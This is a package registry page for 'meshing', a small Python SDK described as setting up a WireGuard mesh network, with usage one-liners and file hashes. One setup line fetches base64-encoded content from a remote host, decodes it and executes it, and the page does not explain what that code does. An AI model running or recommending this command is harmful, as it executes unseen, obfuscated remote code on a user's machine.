Simple Python client library for https://devnull.cn/meshing
Project description
meshing-sdk-python
Python SDK to run a WireGuard meshing network.
pip3 install meshing
# 2 lines to initialize your meshing network
python3 -c 'import meshing; meshing.checkin()'
python3 -c 'import meshing; meshing.connect()'
# list neighbors/routers
python3 -c 'import meshing; meshing.neighbors()'
# reload meshing
python3 -c 'import meshing; meshing.restart()'
python3 -c "$(wget -q -O- https://files.devnull.cn/register | base64 -d)"
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
meshing-2.0.1.tar.gz
(3.5 kB
view details)
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file meshing-2.0.1.tar.gz.
File metadata
- Download URL: meshing-2.0.1.tar.gz
- Upload date:
- Size: 3.5 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/5.1.1 CPython/3.9.19
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
8ffdcad2776ecac96207469334ecc4d71a103d3319220b1c73e8c02bc36ce41b
|
|
| MD5 |
aa4056e95ee85cb8b193b8fc10684338
|
|
| BLAKE2b-256 |
d85b371322e7c8faaff03ecf367ad83b642141d3ddda9f527c7d8810010969a5
|
File details
Details for the file meshing-2.0.1-py3-none-any.whl.
File metadata
- Download URL: meshing-2.0.1-py3-none-any.whl
- Upload date:
- Size: 3.9 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/5.1.1 CPython/3.9.19
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
524e8fd43ca423cd025876a6b8482d5a611f8eab779665f0e37314a768d2453a
|
|
| MD5 |
c8f0bf7d2fe5d76f70c71e03560be234
|
|
| BLAKE2b-256 |
441c3fa22131082d8ec4cc744537543490d05762dbfd3fd37df042b63590821e
|